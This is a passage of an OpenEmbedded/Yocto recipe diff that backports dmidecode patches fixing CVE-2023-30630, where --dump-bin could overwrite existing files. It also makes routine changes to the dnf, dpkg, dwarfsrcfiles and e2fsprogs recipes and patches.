+Backport Changes:
+- In the file dmidecode.c, the commit [dd593d2] in v3.3 introduces
+ pr_info(). This is backported to printf() as per v3.2.
+
+Signed-off-by: Jean Delvare <jdelvare@suse.de>
+Reviewed-by: Jerry Hoemann <jerry.hoemann@hpe.com>
+(cherry picked from commit 39b2dd7b6ab719b920e96ed832cfb4bdd664e808)
+Signed-off-by: Dhairya Nagodra <dnagodra@cisco.com>
+---
+ dmidecode.c | 86 ++++++++++++++++++++++++++++++++++++++---------------
+ 1 file changed, 62 insertions(+), 24 deletions(-)
+
+diff --git a/dmidecode.c b/dmidecode.c
+index a3e9d6c..d6eedd1 100644
+--- a/dmidecode.c
++++ b/dmidecode.c
+@@ -5211,8 +5211,9 @@ static void dmi_table_decode(u8 *buf, u32 len, u16 num, u16 ver, u32 flags)
+ }
+ }
+
+-static void dmi_table(off_t base, u32 len, u16 num, u32 ver, const char *devmem,
+- u32 flags)
++/* Allocates a buffer for the table, must be freed by the caller */
++static u8 *dmi_table_get(off_t base, u32 *len, u16 num, u32 ver,
++ const char *devmem, u32 flags)
+ {
+ u8 *buf;
+
+@@ -5231,7 +5232,7 @@ static void dmi_table(off_t base, u32 len, u16 num, u32 ver, const char *devmem,
+ {
+ if (num)
+ printf("%u structures occupying %u bytes.\n",
+- num, len);
++ num, *len);
+ if (!(opt.flags & FLAG_FROM_DUMP))
+ printf("Table at 0x%08llX.\n",
+ (unsigned long long)base);
+@@ -5249,19 +5250,19 @@ static void dmi_table(off_t base, u32 len, u16 num, u32 ver, const char *devmem,
+ * would be the result of the kernel truncating the table on
+ * parse error.
+ */
+- size_t size = len;
++ size_t size = *len;
+ buf = read_file(flags & FLAG_NO_FILE_OFFSET ? 0 : base,
+ &size, devmem);
+- if (!(opt.flags & FLAG_QUIET) && num && size != (size_t)len)
++ if (!(opt.flags & FLAG_QUIET) && num && size != (size_t)*len)
+ {
+ fprintf(stderr, "Wrong DMI structures length: %u bytes "
+ "announced, only %lu bytes available.\n",
+- len, (unsigned long)size);
++ *len, (unsigned long)size);
+ }
+- len = size;
++ *len = size;
+ }
+ else
+- buf = mem_chunk(base, len, devmem);
++ buf = mem_chunk(base, *len, devmem);
+
+ if (buf == NULL)
+ {
+@@ -5271,15 +5272,9 @@ static void dmi_table(off_t base, u32 len, u16 num, u32 ver, const char *devmem,
+ fprintf(stderr,
+ "Try compiling dmidecode with -DUSE_MMAP.\n");
+ #endif
+- return;
+ }
+
+- if (opt.flags & FLAG_DUMP_BIN)
+- dmi_table_dump(buf, len);
+- else
+- dmi_table_decode(buf, len, num, ver >> 8, flags);
+-
+- free(buf);
++ return buf;
+ }
+
+
+@@ -5314,8 +5309,9 @@ static void overwrite_smbios3_address(u8 *buf)
+
+ static int smbios3_decode(u8 *buf, const char *devmem, u32 flags)
+ {
+- u32 ver;
++ u32 ver, len;
+ u64 offset;
++ u8 *table;
+
+ /* Don't let checksum run beyond the buffer */
+ if (buf[0x06] > 0x20)
+@@ -5341,8 +5337,12 @@ static int smbios3_decode(u8 *buf, const char *devmem, u32 flags)
+ return 0;
+ }
+
+- dmi_table(((off_t)offset.h << 32) | offset.l,
+- DWORD(buf + 0x0C), 0, ver, devmem, flags | FLAG_STOP_AT_EOT);
++ /* Maximum length, may get trimmed */
++ len = DWORD(buf + 0x0C);
++ table = dmi_table_get(((off_t)offset.h << 32) | offset.l, &len, 0, ver,
++ devmem, flags | FLAG_STOP_AT_EOT);
++ if (table == NULL)
++ return 1;
+
+ if (opt.flags & FLAG_DUMP_BIN)
+ {
+@@ -5351,18 +5351,28 @@ static int smbios3_decode(u8 *buf, const char *devmem, u32 flags)
+ memcpy(crafted, buf, 32);
+ overwrite_smbios3_address(crafted);
+
++ dmi_table_dump(table, len);
+ if (!(opt.flags & FLAG_QUIET))
+ printf("# Writing %d bytes to %s.\n", crafted[0x06],
+ opt.dumpfile);
+ write_dump(0, crafted[0x06], crafted, opt.dumpfile, 1);
+ }
++ else
++ {
++ dmi_table_decode(table, len, 0, ver >> 8,
++ flags | FLAG_STOP_AT_EOT);
++ }
++
++ free(table);
+
+ return 1;
+ }
+
+ static int smbios_decode(u8 *buf, const char *devmem, u32 flags)
+ {
+- u16 ver;
++ u16 ver, num;
++ u32 len;
++ u8 *table;
+
+ /* Don't let checksum run beyond the buffer */
+ if (buf[0x05] > 0x20)
+@@ -5402,8 +5412,13 @@ static int smbios_decode(u8 *buf, const char *devmem, u32 flags)
+ printf("SMBIOS %u.%u present.\n",
+ ver >> 8, ver & 0xFF);
+
+- dmi_table(DWORD(buf + 0x18), WORD(buf + 0x16), WORD(buf + 0x1C),
+- ver << 8, devmem, flags);
++ /* Maximum length, may get trimmed */
++ len = WORD(buf + 0x16);
++ num = WORD(buf + 0x1C);
++ table = dmi_table_get(DWORD(buf + 0x18), &len, num, ver << 8,
++ devmem, flags);
++ if (table == NULL)
++ return 1;
+
+ if (opt.flags & FLAG_DUMP_BIN)
+ {
+@@ -5412,27 +5427,43 @@ static int smbios_decode(u8 *buf, const char *devmem, u32 flags)
+ memcpy(crafted, buf, 32);
+ overwrite_dmi_address(crafted + 0x10);
+
++ dmi_table_dump(table, len);
+ if (!(opt.flags & FLAG_QUIET))
+ printf("# Writing %d bytes to %s.\n", crafted[0x05],
+ opt.dumpfile);
+ write_dump(0, crafted[0x05], crafted, opt.dumpfile, 1);
+ }
++ else
++ {
++ dmi_table_decode(table, len, num, ver, flags);
++ }
++
++ free(table);
+
+ return 1;
+ }
+
+ static int legacy_decode(u8 *buf, const char *devmem, u32 flags)
+ {
++ u16 ver, num;
++ u32 len;
++ u8 *table;
++
+ if (!checksum(buf, 0x0F))
+ return 0;
+
++ ver = ((buf[0x0E] & 0xF0) << 4) + (buf[0x0E] & 0x0F);
+ if (!(opt.flags & FLAG_QUIET))
+ printf("Legacy DMI %u.%u present.\n",
+ buf[0x0E] >> 4, buf[0x0E] & 0x0F);
+
+- dmi_table(DWORD(buf + 0x08), WORD(buf + 0x06), WORD(buf + 0x0C),
+- ((buf[0x0E] & 0xF0) << 12) + ((buf[0x0E] & 0x0F) << 8),
+- devmem, flags);
++ /* Maximum length, may get trimmed */
++ len = WORD(buf + 0x06);
++ num = WORD(buf + 0x0C);
++ table = dmi_table_get(DWORD(buf + 0x08), &len, num, ver << 8,
++ devmem, flags);
++ if (table == NULL)
++ return 1;
+
+ if (opt.flags & FLAG_DUMP_BIN)
+ {
+@@ -5441,11 +5472,18 @@ static int legacy_decode(u8 *buf, const char *devmem, u32 flags)
+ memcpy(crafted, buf, 16);
+ overwrite_dmi_address(crafted);
+
++ dmi_table_dump(table, len);
+ if (!(opt.flags & FLAG_QUIET))
+ printf("# Writing %d bytes to %s.\n", 0x0F,
+ opt.dumpfile);
+ write_dump(0, 0x0F, crafted, opt.dumpfile, 1);
+ }
++ else
++ {
++ dmi_table_decode(table, len, num, ver, flags);
++ }
++
++ free(table);
+
+ return 1;
+ }
diff --git a/meta/recipes-devtools/dmidecode/dmidecode/CVE-2023-30630-dependent_p2.patch b/meta/recipes-devtools/dmidecode/dmidecode/CVE-2023-30630-dependent_p2.patch
new file mode 100644
index 0000000000..353c2553f5
--- /dev/null
+++ b/meta/recipes-devtools/dmidecode/dmidecode/CVE-2023-30630-dependent_p2.patch
@@ -0,0 +1,198 @@
+From 58e8a07b1aef0e53af1642b30248255e53e42790 Mon Sep 17 00:00:00 2001
+From: Jean Delvare <jdelvare@suse.de>
+Date: Mon, 20 Feb 2023 14:53:25 +0100
+Subject: [PATCH] dmidecode: Write the whole dump file at once
+
+When option --dump-bin is used, write the whole dump file at once,
+instead of opening and closing the file separately for the table
+and then for the entry point.
+
+As the file writing function is no longer generic, it gets moved
+from util.c to dmidecode.c.
+
+One minor functional change resulting from the new implementation is
+that the entry point is written first now, so the messages printed
+are swapped.
+
+CVE: CVE-2023-30630
+Upstream-Status: Backport [https://git.savannah.nongnu.org/cgit/dmidecode.git/commit/?id=d8cfbc808f38]
+
+Backport Changes:
+- In the file dmidecode.c, the commit [2241f1d] in v3.3 introduces
+ pr_info(). This is backported to printf() as per v3.2.
+
+Signed-off-by: Jean Delvare <jdelvare@suse.de>
+Reviewed-by: Jerry Hoemann <jerry.hoemann@hpe.com>
+(cherry picked from commit d8cfbc808f387e87091c25e7d5b8c2bb348bb206)
+Signed-off-by: Dhairya Nagodra <dnagodra@cisco.com>
+
+---
+ dmidecode.c | 69 +++++++++++++++++++++++++++++++++++++++--------------
+ util.c | 40 -------------------------------
+ util.h | 1 -
+ 3 files changed, 51 insertions(+), 59 deletions(-)
+
+diff --git a/dmidecode.c b/dmidecode.c
+index d6eedd1..b91e53b 100644
+--- a/dmidecode.c
++++ b/dmidecode.c
+@@ -5094,11 +5094,56 @@ static void dmi_table_string(const struct dmi_header *h, const u8 *data, u16 ver
+ }
+ }
+
+-static void dmi_table_dump(const u8 *buf, u32 len)
++static int dmi_table_dump(const u8 *ep, u32 ep_len, const u8 *table,
++ u32 table_len)
+ {
++ FILE *f;
++
++ f = fopen(opt.dumpfile, "wb");
++ if (!f)
++ {
++ fprintf(stderr, "%s: ", opt.dumpfile);
++ perror("fopen");
++ return -1;
++ }
++
++ if (!(opt.flags & FLAG_QUIET))
++ printf("# Writing %d bytes to %s.\n", ep_len, opt.dumpfile);
++ if (fwrite(ep, ep_len, 1, f) != 1)
++ {
++ fprintf(stderr, "%s: ", opt.dumpfile);
++ perror("fwrite");
++ goto err_close;
++ }
++
++ if (fseek(f, 32, SEEK_SET) != 0)
++ {
++ fprintf(stderr, "%s: ", opt.dumpfile);
++ perror("fseek");
++ goto err_close;
++ }
++
+ if (!(opt.flags & FLAG_QUIET))
+- printf("# Writing %d bytes to %s.\n", len, opt.dumpfile);
+- write_dump(32, len, buf, opt.dumpfile, 0);
++ printf("# Writing %d bytes to %s.\n", table_len, opt.dumpfile);
++ if (fwrite(table, table_len, 1, f) != 1)
++ {
++ fprintf(stderr, "%s: ", opt.dumpfile);
++ perror("fwrite");
++ goto err_close;
++ }
++
++ if (fclose(f))
++ {
++ fprintf(stderr, "%s: ", opt.dumpfile);
++ perror("fclose");
++ return -1;
++ }
++
++ return 0;
++
++err_close:
++ fclose(f);
++ return -1;
+ }
+
+ static void dmi_table_decode(u8 *buf, u32 len, u16 num, u16 ver, u32 flags)
+@@ -5351,11 +5396,7 @@ static int smbios3_decode(u8 *buf, const char *devmem, u32 flags)
+ memcpy(crafted, buf, 32);
+ overwrite_smbios3_address(crafted);
+
+- dmi_table_dump(table, len);
+- if (!(opt.flags & FLAG_QUIET))
+- printf("# Writing %d bytes to %s.\n", crafted[0x06],
+- opt.dumpfile);
+- write_dump(0, crafted[0x06], crafted, opt.dumpfile, 1);
++ dmi_table_dump(crafted, crafted[0x06], table, len);
+ }
+ else
+ {
+@@ -5427,11 +5468,7 @@ static int smbios_decode(u8 *buf, const char *devmem, u32 flags)
+ memcpy(crafted, buf, 32);
+ overwrite_dmi_address(crafted + 0x10);
+
+- dmi_table_dump(table, len);
+- if (!(opt.flags & FLAG_QUIET))
+- printf("# Writing %d bytes to %s.\n", crafted[0x05],
+- opt.dumpfile);
+- write_dump(0, crafted[0x05], crafted, opt.dumpfile, 1);
++ dmi_table_dump(crafted, crafted[0x05], table, len);
+ }
+ else
+ {
+@@ -5472,11 +5509,7 @@ static int legacy_decode(u8 *buf, const char *devmem, u32 flags)
+ memcpy(crafted, buf, 16);
+ overwrite_dmi_address(crafted);
+
+- dmi_table_dump(table, len);
+- if (!(opt.flags & FLAG_QUIET))
+- printf("# Writing %d bytes to %s.\n", 0x0F,
+- opt.dumpfile);
+- write_dump(0, 0x0F, crafted, opt.dumpfile, 1);
++ dmi_table_dump(crafted, 0x0F, table, len);
+ }
+ else
+ {
+diff --git a/util.c b/util.c
+index eeffdae..2e1931c 100644
+--- a/util.c
++++ b/util.c
+@@ -247,46 +247,6 @@ out:
+ return p;
+ }
+
+-int write_dump(size_t base, size_t len, const void *data, const char *dumpfile, int add)
+-{
+- FILE *f;
+-
+- f = fopen(dumpfile, add ? "r+b" : "wb");
+- if (!f)
+- {
+- fprintf(stderr, "%s: ", dumpfile);
+- perror("fopen");
+- return -1;
+- }
+-
+- if (fseek(f, base, SEEK_SET) != 0)
+- {
+- fprintf(stderr, "%s: ", dumpfile);
+- perror("fseek");
+- goto err_close;
+- }
+-
+- if (fwrite(data, len, 1, f) != 1)
+- {
+- fprintf(stderr, "%s: ", dumpfile);
+- perror("fwrite");
+- goto err_close;
+- }
+-
+- if (fclose(f))
+- {
+- fprintf(stderr, "%s: ", dumpfile);
+- perror("fclose");
+- return -1;
+- }
+-
+- return 0;
+-
+-err_close:
+- fclose(f);
+- return -1;
+-}
+-
+ /* Returns end - start + 1, assuming start < end */
+ u64 u64_range(u64 start, u64 end)
+ {
+diff --git a/util.h b/util.h
+index 3094cf8..ef24eb9 100644
+--- a/util.h
++++ b/util.h
+@@ -27,5 +27,4 @@
+ int checksum(const u8 *buf, size_t len);
+ void *read_file(off_t base, size_t *len, const char *filename);
+ void *mem_chunk(off_t base, size_t len, const char *devmem);
+-int write_dump(size_t base, size_t len, const void *data, const char *dumpfile, int add);
+ u64 u64_range(u64 start, u64 end);
diff --git a/meta/recipes-devtools/dmidecode/dmidecode/CVE-2023-30630.patch b/meta/recipes-devtools/dmidecode/dmidecode/CVE-2023-30630.patch
new file mode 100644
index 0000000000..bf4d060c8c
--- /dev/null
+++ b/meta/recipes-devtools/dmidecode/dmidecode/CVE-2023-30630.patch
@@ -0,0 +1,62 @@
+From b7dacccff32294ea522df32a9391d0218e7600ea Mon Sep 17 00:00:00 2001
+From: Jean Delvare <jdelvare@suse.de>
+Date: Mon, 20 Feb 2023 14:53:31 +0100
+Subject: [PATCH] dmidecode: Do not let --dump-bin overwrite an existing file
+
+Make sure that the file passed to option --dump-bin does not already
+exist. In practice, it is rather unlikely that an honest user would
+want to overwrite an existing dump file, while this possibility
+could be used by a rogue user to corrupt a system file.
+
+CVE: CVE-2023-30630
+Upstream-Status: Backport [https://git.savannah.nongnu.org/cgit/dmidecode.git/commit/?id=6ca381c1247c]
+
+Backport Changes:
+- Ignored changes in man/dmidecode.8 file.
+
+Signed-off-by: Jean Delvare <jdelvare@suse.de>
+Reviewed-by: Jerry Hoemann <jerry.hoemann@hpe.com>
+(cherry picked from commit 6ca381c1247c81f74e1ca4e7706f70bdda72e6f2)
+Signed-off-by: Dhairya Nagodra <dnagodra@cisco.com>
+
+---
+ dmidecode.c | 14 ++++++++++++--
+ 1 file changed, 12 insertions(+), 2 deletions(-)
+
+diff --git a/dmidecode.c b/dmidecode.c
+index b91e53b..846d9a1 100644
+--- a/dmidecode.c
++++ b/dmidecode.c
+@@ -60,6 +60,7 @@
+ * https://www.dmtf.org/sites/default/files/DSP0270_1.0.1.pdf
+ */
+
++#include <fcntl.h>
+ #include <stdio.h>
+ #include <string.h>
+ #include <strings.h>
+@@ -5097,13 +5098,22 @@ static void dmi_table_string(const struct dmi_header *h, const u8 *data, u16 ver
+ static int dmi_table_dump(const u8 *ep, u32 ep_len, const u8 *table,
+ u32 table_len)
+ {
++ int fd;
+ FILE *f;
+
+- f = fopen(opt.dumpfile, "wb");
++ fd = open(opt.dumpfile, O_WRONLY|O_CREAT|O_EXCL, 0666);
++ if (fd == -1)
++ {
++ fprintf(stderr, "%s: ", opt.dumpfile);
++ perror("open");
++ return -1;
++ }
++
++ f = fdopen(fd, "wb");
+ if (!f)
+ {
+ fprintf(stderr, "%s: ", opt.dumpfile);
+- perror("fopen");
++ perror("fdopen");
+ return -1;
+ }
+
diff --git a/meta/recipes-devtools/dmidecode/dmidecode_3.2.bb b/meta/recipes-devtools/dmidecode/dmidecode_3.2.bb
index 63f4061cb7..1e7c38dc8a 100644
--- a/meta/recipes-devtools/dmidecode/dmidecode_3.2.bb
+++ b/meta/recipes-devtools/dmidecode/dmidecode_3.2.bb
@@ -1,10 +1,14 @@
SUMMARY = "DMI (Desktop Management Interface) table related utilities"
HOMEPAGE = "http://www.nongnu.org/dmidecode/"
+DESCRIPTION = "Dmidecode reports information about your system's hardware as described in your system BIOS according to the SMBIOS/DMI standard (see a sample output)."
LICENSE = "GPLv2"
LIC_FILES_CHKSUM = "file://LICENSE;md5=b234ee4d69f5fce4486a80fdaf4a4263"
SRC_URI = "${SAVANNAH_NONGNU_MIRROR}/dmidecode/${BP}.tar.xz \
file://0001-Committing-changes-from-do_unpack_extra.patch \
+ file://CVE-2023-30630-dependent_p1.patch \
+ file://CVE-2023-30630-dependent_p2.patch \
+ file://CVE-2023-30630.patch \
"
COMPATIBLE_HOST = "(i.86|x86_64|aarch64|arm|powerpc|powerpc64).*-linux"
diff --git a/meta/recipes-devtools/dnf/dnf/0040-Keep-installed-packages-in-upgrade-job-RhBug-1728252.patch b/meta/recipes-devtools/dnf/dnf/0040-Keep-installed-packages-in-upgrade-job-RhBug-1728252.patch
new file mode 100644
index 0000000000..57c2375a54
--- /dev/null
+++ b/meta/recipes-devtools/dnf/dnf/0040-Keep-installed-packages-in-upgrade-job-RhBug-1728252.patch
@@ -0,0 +1,60 @@
+From c88a77198c0156e425c2725f30e481207de5162f Mon Sep 17 00:00:00 2001
+From: Jaroslav Mracek <jmracek@redhat.com>
+Date: Tue, 3 Sep 2019 11:01:51 +0200
+Subject: [PATCH] Keep installed packages in upgrade job
+ (RhBug:1728252,1644241,1741381)
+
+In combination with marking of job as TARGETED it prevents from
+reinstalling of modified packages with same NEVRA.
+
+https://bugzilla.redhat.com/show_bug.cgi?id=1728252
+https://bugzilla.redhat.com/show_bug.cgi?id=1644241
+https://bugzilla.redhat.com/show_bug.cgi?id=1741381
+
+Closes: #1474
+Approved by: m-blaha
+
+
+Backport to fix bug in dnf in oe-core
+from https://github.com/rpm-software-management/dnf
+
+Removed spec file portion of patch
+
+Upstream-Status: Backport
+Signed-off-by: Jate Sujjavanich <jatedev@gmail.com>
+---
+ dnf.spec | 4 ++--
+ dnf/base.py | 3 ---
+ dnf/module/module_base.py | 2 +-
+ 3 files changed, 3 insertions(+), 6 deletions(-)
+
+diff --git a/dnf/base.py b/dnf/base.py
+index b2ced61..628c154 100644
+--- a/dnf/base.py
++++ b/dnf/base.py
+@@ -1968,9 +1968,6 @@ class Base(object):
+ obsoletes=q.installed().union(q.upgrades()))
+ # add obsoletes into transaction
+ q = q.union(obsoletes)
+- # provide only available packages to solver otherwise selection of available
+- # possibilities will be ignored
+- q = q.available()
+ if reponame is not None:
+ q.filterm(reponame=reponame)
+ q = self._merge_update_filters(q, pkg_spec=pkg_spec)
+diff --git a/dnf/module/module_base.py b/dnf/module/module_base.py
+index 976d730..ce70f63 100644
+--- a/dnf/module/module_base.py
++++ b/dnf/module/module_base.py
+@@ -214,7 +214,7 @@ class ModuleBase(object):
+
+ if not upgrade_package_set:
+ logger.error(_("Unable to match profile in argument {}").format(spec))
+- query = self.base.sack.query().available().filterm(name=upgrade_package_set)
++ query = self.base.sack.query().filterm(name=upgrade_package_set)
+ if query:
+ sltr = dnf.selector.Selector(self.base.sack)
+ sltr.set(pkg=query)
+--
+2.7.4
+
diff --git a/meta/recipes-devtools/dnf/dnf_4.2.2.bb b/meta/recipes-devtools/dnf/dnf_4.2.2.bb
index a046ffc05d..6b6b233d6d 100644
--- a/meta/recipes-devtools/dnf/dnf_4.2.2.bb
+++ b/meta/recipes-devtools/dnf/dnf_4.2.2.bb
@@ -2,12 +2,13 @@ SUMMARY = "Package manager forked from Yum, using libsolv as a dependency resolv
DESCRIPTION = "Software package manager that installs, updates, and removes \
packages on RPM-based Linux distributions. It automatically computes \
dependencies and determines the actions required to install packages."
+HOMEPAGE = "https://github.com/rpm-software-management/dnf"
LICENSE = "GPLv2"
LIC_FILES_CHKSUM = "file://COPYING;md5=b234ee4d69f5fce4486a80fdaf4a4263 \
file://PACKAGE-LICENSING;md5=4a0548e303dbc77f067335b4d688e745 \
"
-SRC_URI = "git://github.com/rpm-software-management/dnf.git \
+SRC_URI = "git://github.com/rpm-software-management/dnf.git;branch=master;protocol=https \
file://0001-Corretly-install-tmpfiles.d-configuration.patch \
file://0001-Do-not-hardcode-etc-and-systemd-unit-directories.patch \
file://0005-Do-not-prepend-installroot-to-logdir.patch \
@@ -15,6 +16,7 @@ SRC_URI = "git://github.com/rpm-software-management/dnf.git \
file://0030-Run-python-scripts-using-env.patch \
file://Fix-SyntaxWarning.patch \
file://0001-set-python-path-for-completion_helper.patch \
+ file://0040-Keep-installed-packages-in-upgrade-job-RhBug-1728252.patch \
"
SRCREV = "9947306a55271b8b7c9e2b6e3b7d582885b6045d"
diff --git a/meta/recipes-devtools/dosfstools/dosfstools_4.1.bb b/meta/recipes-devtools/dosfstools/dosfstools_4.1.bb
index e4ab113391..4bd4aef099 100644
--- a/meta/recipes-devtools/dosfstools/dosfstools_4.1.bb
+++ b/meta/recipes-devtools/dosfstools/dosfstools_4.1.bb
@@ -22,7 +22,7 @@ EXTRA_OECONF = "--without-udev --enable-compat-symlinks"
CFLAGS += "-D_GNU_SOURCE -D_LARGEFILE_SOURCE -D_FILE_OFFSET_BITS=64"
-BBCLASSEXTEND = "native"
+BBCLASSEXTEND = "native nativesdk"
# Add codepage437 to avoid error from `dosfsck -l`
RRECOMMENDS_${PN}_append_libc-glibc = " glibc-gconv-ibm437"
diff --git a/meta/recipes-devtools/dpkg/dpkg.inc b/meta/recipes-devtools/dpkg/dpkg.inc
index 1c3c585d79..f008959d77 100644
--- a/meta/recipes-devtools/dpkg/dpkg.inc
+++ b/meta/recipes-devtools/dpkg/dpkg.inc
@@ -1,5 +1,7 @@
SUMMARY = "Package maintenance system from Debian"
LICENSE = "GPLv2.0+"
+HOMEPAGE = "https://salsa.debian.org/dpkg-team/dpkg"
+DESCRIPTION = "The primary interface for the dpkg suite is the dselect program. A more low-level and less user-friendly interface is available in the form of the dpkg command."
SECTION = "base"
DEPENDS = "zlib bzip2 perl ncurses"
diff --git a/meta/recipes-devtools/dpkg/dpkg_1.19.7.bb b/meta/recipes-devtools/dpkg/dpkg_1.19.8.bb
index e9dec337b3..9e6e9f2464 100644
--- a/meta/recipes-devtools/dpkg/dpkg_1.19.7.bb
+++ b/meta/recipes-devtools/dpkg/dpkg_1.19.8.bb
@@ -18,5 +18,5 @@ SRC_URI_append_class-native = " \
file://tweak-options-require-tar-1.27.patch \
"
-SRC_URI[md5sum] = "60f57c5494e6dfa177504d47bfa0e383"
-SRC_URI[sha256sum] = "4c27fededf620c0aa522fff1a48577ba08144445341257502e7730f2b1a296e8"
+SRC_URI[md5sum] = "9d170c8baa1aa36b09698c909f304508"
+SRC_URI[sha256sum] = "2632c00b0cf0ea19ed7bd6700e6ec5faca93f0045af629d356dc03ad74ae6f10"
diff --git a/meta/recipes-devtools/dwarfsrcfiles/dwarfsrcfiles.bb b/meta/recipes-devtools/dwarfsrcfiles/dwarfsrcfiles.bb
index 2c843a9342..56b52d6a47 100644
--- a/meta/recipes-devtools/dwarfsrcfiles/dwarfsrcfiles.bb
+++ b/meta/recipes-devtools/dwarfsrcfiles/dwarfsrcfiles.bb
@@ -1,4 +1,5 @@
SUMMARY = "A small utility for printing debug source file locations embedded in binaries"
+DESCRIPTION = "${SUMMARY}"
LICENSE = "GPLv2+"
LIC_FILES_CHKSUM = "file://../dwarfsrcfiles.c;md5=31483894e453a77acbb67847565f1b5c;beginline=1;endline=8"
diff --git a/meta/recipes-devtools/dwarfsrcfiles/files/dwarfsrcfiles.c b/meta/recipes-devtools/dwarfsrcfiles/files/dwarfsrcfiles.c
index af7af524eb..9eb5ca807a 100644
--- a/meta/recipes-devtools/dwarfsrcfiles/files/dwarfsrcfiles.c
+++ b/meta/recipes-devtools/dwarfsrcfiles/files/dwarfsrcfiles.c
@@ -9,6 +9,7 @@
#include <argp.h>
#include <stdio.h>
+#include <stdlib.h>
#include <dwarf.h>
#include <elfutils/libdw.h>
@@ -83,13 +84,15 @@ process_cu (Dwarf_Die *cu_die)
int
main (int argc, char **argv)
{
- char* args[3];
+ char* args[5];
int res = 0;
Dwfl *dwfl;
Dwarf_Addr bias;
- if (argc != 2)
+ if (argc != 2) {
fprintf(stderr, "Usage %s <file>", argv[0]);
+ exit(EXIT_FAILURE);
+ }
// Pretend "dwarfsrcfiles -e <file>" was given, so we can use standard
// dwfl argp parser to open the file for us and get our Dwfl. Useful
@@ -98,8 +101,12 @@ main (int argc, char **argv)
args[0] = argv[0];
args[1] = "-e";
args[2] = argv[1];
+ // We don't want to follow debug linked files due to the way OE processes
+ // files, could race against changes in the linked binary (e.g. objcopy on it)
+ args[3] = "--debuginfo-path";
+ args[4] = "/not/exist";
- argp_parse (dwfl_standard_argp (), 3, args, 0, NULL, &dwfl);
+ argp_parse (dwfl_standard_argp (), 5, args, 0, NULL, &dwfl);
Dwarf_Die *cu = NULL;
while ((cu = dwfl_nextcu (dwfl, cu, &bias)) != NULL)
diff --git a/meta/recipes-devtools/e2fsprogs/e2fsprogs.inc b/meta/recipes-devtools/e2fsprogs/e2fsprogs.inc
index 009f5ed807..57e4665a34 100644
--- a/meta/recipes-devtools/e2fsprogs/e2fsprogs.inc
+++ b/meta/recipes-devtools/e2fsprogs/e2fsprogs.inc
@@ -3,7 +3,7 @@ DESCRIPTION = "The Ext2 Filesystem Utilities (e2fsprogs) contain all of the stan
fixing, configuring , and debugging ext2 filesystems."
HOMEPAGE = "http://e2fsprogs.sourceforge.net/"
-LICENSE = "GPLv2 & LGPLv2 & BSD & MIT"
+LICENSE = "GPLv2 & LGPLv2 & BSD-3-Clause & MIT"
LICENSE_e2fsprogs-dumpe2fs = "GPLv2"
LICENSE_e2fsprogs-e2fsck = "GPLv2"
LICENSE_e2fsprogs-mke2fs = "GPLv2"
@@ -19,7 +19,7 @@ LIC_FILES_CHKSUM = "file://NOTICE;md5=d50be0580c0b0a7fbc7a4830bbe6c12b \
SECTION = "base"
DEPENDS = "util-linux attr"
-SRC_URI = "git://git.kernel.org/pub/scm/fs/ext2/e2fsprogs.git"
+SRC_URI = "git://git.kernel.org/pub/scm/fs/ext2/e2fsprogs.git;branch=master"
S = "${WORKDIR}/git"
inherit autotools gettext texinfo pkgconfig multilib_header update-alternatives ptest
diff --git a/meta/recipes-devtools/e2fsprogs/e2fsprogs/0001-e2fsck-don-t-try-to-rehash-a-deleted-directory.patch b/meta/recipes-devtools/e2fsprogs/e2fsprogs/0001-e2fsck-don-t-try-to-rehash-a-deleted-directory.patch
deleted file mode 100644
index ba4e3a3c97..0000000000
--- a/meta/recipes-devtools/e2fsprogs/e2fsprogs/0001-e2fsck-don-t-try-to-rehash-a-deleted-directory.patch
+++ /dev/null
@@ -1,49 +0,0 @@
-From 71ba13755337e19c9a826dfc874562a36e1b24d3 Mon Sep 17 00:00:00 2001
-From: Theodore Ts'o <tytso@mit.edu>
-Date: Thu, 19 Dec 2019 19:45:06 -0500
-Subject: [PATCH] e2fsck: don't try to rehash a deleted directory
-
-If directory has been deleted in pass1[bcd] processing, then we
-shouldn't try to rehash the directory in pass 3a when we try to
-rehash/reoptimize directories.
-
-Signed-off-by: Theodore Ts'o <tytso@mit.edu>
-
-Upstream-Status: Backport [https://git.kernel.org/pub/scm/fs/ext2/e2fsprogs.git/commit/?id=71ba13755337e19c9a826dfc874562a36e1b24d3]
-Signed-off-by: Anuj Mittal <anuj.mittal@intel.com>
----
- e2fsck/pass1b.c | 4 ++++
- e2fsck/rehash.c | 2 ++
- 2 files changed, 6 insertions(+)
-
-diff --git a/e2fsck/pass1b.c b/e2fsck/pass1b.c
-index 5693b9cf..bca701ca 100644
---- a/e2fsck/pass1b.c
-+++ b/e2fsck/pass1b.c
-@@ -705,6 +705,10 @@ static void delete_file(e2fsck_t ctx, ext2_ino_t ino,
- fix_problem(ctx, PR_1B_BLOCK_ITERATE, &pctx);
- if (ctx->inode_bad_map)
- ext2fs_unmark_inode_bitmap2(ctx->inode_bad_map, ino);
-+ if (ctx->inode_reg_map)
-+ ext2fs_unmark_inode_bitmap2(ctx->inode_reg_map, ino);
-+ ext2fs_unmark_inode_bitmap2(ctx->inode_dir_map, ino);
-+ ext2fs_unmark_inode_bitmap2(ctx->inode_used_map, ino);
- ext2fs_inode_alloc_stats2(fs, ino, -1, LINUX_S_ISDIR(dp->inode.i_mode));
- quota_data_sub(ctx->qctx, &dp->inode, ino,
- pb.dup_blocks * fs->blocksize);
-diff --git a/e2fsck/rehash.c b/e2fsck/rehash.c
-index 3dd1e941..2c908be0 100644
---- a/e2fsck/rehash.c
-+++ b/e2fsck/rehash.c
-@@ -1028,6 +1028,8 @@ void e2fsck_rehash_directories(e2fsck_t ctx)
- if (!ext2fs_u32_list_iterate(iter, &ino))
- break;
- }
-+ if (!ext2fs_test_inode_bitmap2(ctx->inode_dir_map, ino))
-+ continue;
-
- pctx.dir = ino;
- if (first) {
---
-2.24.1
-
diff --git a/meta/recipes-devtools/e2fsprogs/e2fsprogs/0001-misc-create_inode.c-set-dir-s-mode-correctly.patch b/meta/recipes-devtools/e2fsprogs/e2fsprogs/0001-misc-create_inode.c-set-dir-s-mode-correctly.patch
deleted file mode 100644
index fc4a540986..0000000000
--- a/meta/recipes-devtools/e2fsprogs/e2fsprogs/0001-misc-create_inode.c-set-dir-s-mode-correctly.patch
+++ /dev/null
@@ -1,41 +0,0 @@
-From f6d188580c2c9599319076fee22f2424652c711c Mon Sep 17 00:00:00 2001
-From: Robert Yang <liezhi.yang@windriver.com>
-Date: Wed, 13 Sep 2017 19:55:35 -0700
-Subject: [PATCH] misc/create_inode.c: set dir's mode correctly
-
-The dir's mode has been set by ext2fs_mkdir() with umask, so
-reset it to the source's mode in set_inode_extra().
-
-Fixed when source dir's mode is 521, but tarball would be 721, this was
-incorrect.
-
